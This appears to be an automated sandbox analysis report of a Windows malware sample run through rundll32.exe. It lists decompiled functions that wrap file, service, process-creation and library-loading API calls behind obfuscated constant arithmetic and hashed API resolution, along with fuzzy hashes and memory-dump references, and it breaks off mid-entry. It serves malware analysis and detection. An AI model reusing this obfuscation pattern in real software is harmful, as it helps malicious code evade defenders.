CreateFileW.KERNELBASE(00330668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00330668,?,?,?,?), ref: 0032B5FD

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 6c416353649b2b949d2294600e5a6d6175570f14fccfb6900620e6028caf9356
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: BB11C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1866120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0033981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0032602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E003307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00339821
0x00339822
0x00339825
0x00339828
0x0033982a
0x0033982c
0x0033982f
0x00339832
0x00339835
0x00339836
0x00339837
0x0033983c
0x00339855
0x00339858
0x0033985f
0x00339866
0x0033986d
0x00339874
0x0033987b
0x0033988e
0x0033989b
0x003398a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,003287F2,0000CAAE,0000510C,AD82F196), ref: 0033989B

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 882b047e0b8c691595c99f57648ad4cd1bf479c64f084ef36e1bf1a07758706e
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 94015E76801208FBDB04EFD5D846CDF7F79EF85750F108199F91866220E6715B519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00337BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00337BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E003307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00337bf7
0x00337bf8
0x00337bfa
0x00337bfd
0x00337bff
0x00337c02
0x00337c06
0x00337c07
0x00337c0f
0x00337c1d
0x00337c25
0x00337c2d
0x00337c31
0x00337c38
0x00337c3f
0x00337c46
0x00337c4a
0x00337c5e
0x00337c67
0x00337c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00337C67

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 2188f20a30939c63e280c71eb57948b323243b5a27d3f4b2b183f5446dc54e1e
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 31014FB190120CFFEB09DFA4D84A8DE7BB5EF44314F108198F40567240E6B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0032F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0032F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E003307A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0032f662
0x0032f663
0x0032f665
0x0032f668
0x0032f66a
0x0032f66d
0x0032f670
0x0032f673
0x0032f677
0x0032f678
0x0032f67d
0x0032f687
0x0032f693
0x0032f69a
0x0032f6a1
0x0032f6a5
0x0032f6a9
0x0032f6b0
0x0032f6c9
0x0032f6d8
0x0032f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0032F6D8

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 14cd549d81f5a4aad57bf66395f6df235c9210f6b51b667cb09491cffb11bdeb
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 8A01E5B6901208BBEF059F94DC468DF7F75EB05324F148188F90566250D6B25E21EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0032B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0032B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0032602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E003307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0032b6f3
0x0032b6f8
0x0032b702
0x0032b70b
0x0032b712
0x0032b719
0x0032b720
0x0032b727
0x0032b72e
0x0032b747
0x0032b759
0x0032b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0032B759

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: b1fb7ec0163074bcc2695c772f7c0628010282a4d2c3f7a28c852ca3c4ceb2ba
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 79014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA056A190D3B25E20AB51

Uniqueness

Uniqueness Score: -1.00%

Function 0033AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0033AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E003307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0033aa3f
0x0033aa40
0x0033aa41
0x0033aa44
0x0033aa47
0x0033aa4b
0x0033aa4c
0x0033aa51
0x0033aa5b
0x0033aa64
0x0033aa68
0x0033aa6f
0x0033aa76
0x0033aa8d
0x0033aa90
0x0033aa9d
0x0033aaa8
0x0033aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0033AAA8

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 67e5fdf6b063f4cc5e186f573967d7081333722a884dc9e1442ebf469f84436e
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 61F069B190020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00325FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00325FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0032602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E003307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00325fb5
0x00325fb6
0x00325fb7
0x00325fbb
0x00325fbc
0x00325fc1
0x00325fcb
0x00325fd7
0x00325fde
0x00325fe5
0x00325ffc
0x00325fff
0x00326006
0x0032600d
0x0032601a
0x00326025
0x0032602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00326025

Memory Dump Source

Source File: 00000008.00000002.2102904975.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true

Associated: 00000008.00000002.2102890561.0000000000320000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102933368.000000000033C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: ddd5ee7d26a6c35e067694803469147d3d30a8eb73169ce07aae0d4b448bfe28
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: D7F044B0C11208FFDB08DFA0E94789EBF78EB40300F108198E40967260D7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2688 Parent PID: 2812 rundll32.exeCOMMON

Executed Functions

Function 001F2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001F2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001F602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002007A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x001f295f
0x001f2964
0x001f2967
0x001f296a
0x001f296d
0x001f296e
0x001f296f
0x001f2977
0x001f2985
0x001f298a
0x001f2992
0x001f299a
0x001f29a2
0x001f29a9
0x001f29b0
0x001f29b7
0x001f29bb
0x001f29cf
0x001f29dc
0x001f29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001F29DC

Strings

<^, xrefs: 001F2977

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: 22c181d947d5c3b9079b2eb04d44297966d1c9b7dd736f612a36f4591dae9978
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 1B018072A00208BFEB14DF95DC4A8DFBFB6EF45310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001F602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002007A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001fc6e1
0x001fc6e6
0x001fc6f0
0x001fc6fc
0x001fc703
0x001fc706
0x001fc70d
0x001fc711
0x001fc715
0x001fc71c
0x001fc723
0x001fc72a
0x001fc731
0x001fc738
0x001fc751
0x001fc762
0x001fc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 001FC762

Strings

/O, xrefs: 001FC6E6

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 79b4102c1dea873a57f12ff49eb32eefa7696dc2b46041cafa4feff527189ffe
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: 131133B290122DBBCB25DF95DC498EFBFB8EF05714F108188F90962220D7714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 001F1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001F1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001F602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002007A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x001f1006
0x001f1009
0x001f100c
0x001f1011
0x001f1016
0x001f101d
0x001f1026
0x001f102d
0x001f1034
0x001f103b
0x001f1047
0x001f104f
0x001f1057
0x001f105e
0x001f1065
0x001f106c
0x001f1073
0x001f1077
0x001f108b
0x001f1096
0x001f109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 001F1096

Strings

[, xrefs: 001F103B

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: f83f6239cc42481eb679efaf5e71d5d5f3602f9487418f8f8d18f83b15cf1aba
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: 9F016DB6D0130CFBEF04DF94C94A6DEBBB1EF54318F108188F51466291D7B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 001F4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001F4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002007A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x001f485e
0x001f487a
0x001f487d
0x001f4884
0x001f488b
0x001f4892
0x001f489d
0x001f48a0
0x001f48ad
0x001f48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 001F48B7

Strings

[, xrefs: 001F488B

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 16d6e7736e5bd83a05d39598fdceb209443255c5151720051fd0e763d1ad046e
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: CFF01D70915309FBDB04CFE8C95699EBFB5EB40301F20818CE444B7290E3715F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00204F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00204F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002007A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00204f80
0x00204f81
0x00204f82
0x00204f86
0x00204f87
0x00204f8c
0x00204fa5
0x00204fa8
0x00204faf
0x00204fb6
0x00204fc7
0x00204fca
0x00204fd7
0x00204fe2
0x00204fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00204FE2

Strings

{#lm, xrefs: 00204FC2

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 3baa9677071f580ff9ed1589da305fef3c7bc8fa5d74d7cd9fe7e1eb2b31d20e
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 19F037B081120CFFEB04DFA4D98289EBFBAEB41300F208199E804AB260D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0020976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0020976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002007A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00209772
0x00209773
0x00209778
0x0020977a
0x0020977b
0x0020977e
0x0020977f
0x00209782
0x00209785
0x00209788
0x00209789
0x0020978c
0x0020978f
0x00209790
0x00209791
0x00209794
0x00209797
0x0020979a
0x0020979d
0x002097a0
0x002097a3
0x002097a6
0x002097a7
0x002097a8
0x002097ad
0x002097b7
0x002097c3
0x002097ca
0x002097d1
0x002097d8
0x002097df
0x002097e3
0x002097fc
0x00209816
0x0020981d

APIs

CreateProcessW.KERNEL32(001F591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001F591A), ref: 00209816

Memory Dump Source

Source File: 00000009.00000002.2103864264.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000009.00000002.2103849940.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 00000009.00000002.2103914846.000000000020C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: e9e095bef4881a598618a2ea78be183212cec5bc99613d49aec6f9932c7d2903
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8A11B372901148BBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001FB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001FB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001F602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002007A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x001fb569
0x001fb56a
0x001fb56d
0x001fb572
0x001fb574
0x001fb577
0x001fb57a
0x001fb57d
0x001fb580
0x001fb583
0x001fb586
0x001fb587
0x001fb58a
0x001fb58d
0x001fb590
0x001fb593
0x001fb594
0x001fb595
0x001fb59a
0x001fb5a4
0x001fb5b8
0x001fb5c0
0x001fb5c4
0x001fb5cb
0x001fb5d2
0x001fb5d9
0x001fb5e6
0x001fb5fd
0x001fb604

APIs

CreateFileW.KERNELBASE(00200668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00200668,?,?,?,?), ref: 001FB5FD

Memory Dump Source

